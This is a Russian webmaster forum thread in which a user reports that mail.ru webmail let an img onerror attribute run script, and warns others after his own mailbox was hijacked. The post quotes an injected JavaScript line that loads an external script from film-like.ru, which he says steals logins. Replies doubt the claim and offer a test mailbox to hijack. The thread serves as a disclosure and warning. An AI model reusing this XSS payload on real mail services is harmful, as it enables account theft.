- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Что делать, если ваша email-рассылка попала в спам
10 распространенных причин и решений
Екатерина Ткаченко
Заметил что mail.ru в inbox при прочтении письма успешно пропускает параметр onerror тэга img, что дает "особо хитроjопым" интересные возможности по угону ящика.
Рассмотрим на реальном примере.
Вам пришло письмо, в теле письма картинка, но не простая, а "золотая".
Через параметр error в зашифрованном видео подставлен следующий код:
a=(b=document).createElement('scr'+'ipt')).src='http://film-like.ru/mailru/tt2.js',b.body.appendChild(a);void(0);";С помощью этого кода подгружается js файл со следующим кодом:
Кручу-верчу-обмануть-хочу иии.... ваш логин и пароль в руках злоумышленников.
Довольно часто получаю подобные "письма счастья". Писал в саппорт mail.ru неоднократно, толку нет.
Ящик на мейле под всякий спам, поэтому в целом пофигу, но не солидно для такой конторы иметь такие баги, дырка то серьёзная :dont:
Будьте бдительны, не дайте себя обмануть и т.д.
Характерный признак, если при прочтении письма вас разлогинело, сразу меняйте пароль, это была не случайность )
Я создам сейчас мыло, сможете угнать пароль таким методом? :)
Geers, как у меня будет время давайте попробуем.
Geers, как у меня будет время давайте попробуем.
Не стоит, он не сработает. :)
Geers, Просто ТС думает, что он гораздо умнее программеров и СБ мэйла.
К сожалению сработает.
Нда.. делай добро и бросай его в воду.
Ладно проехали, mail.ru - самый безопасный почтовый веб сервис.
Alex6980, Ну если вы так уверены, то покажите пример ... вам уже предложили угнать ящик. Сделайте это, а за палево уязвимости думаю мэйл вас отблагодарит.
Ребят, я не о том. Я не говорю что я написал чудо код. У меня угоняли ящик, не сразу понял каким образом, потом разобрался и выложил причину в этом посте.
---------- Добавлено 09.05.2012 в 15:46 ----------
Мне было бы достаточно чтобы они обратили внимания на существующую проблему и сделали так чтобы это не работало.
Alex6980, вы в присланном коде разбираетесь?
Поверхностно.. Есть свои мнения по этому коду? Готов с интересом выслушать. Форум покоцал часть кода(та что в тегэ img), полные исходники могу переслать на почту или выложить где нить.
Здравомыслящие люди почту на mail.ru не держат и дело вовсе не в том, что вы описали, тс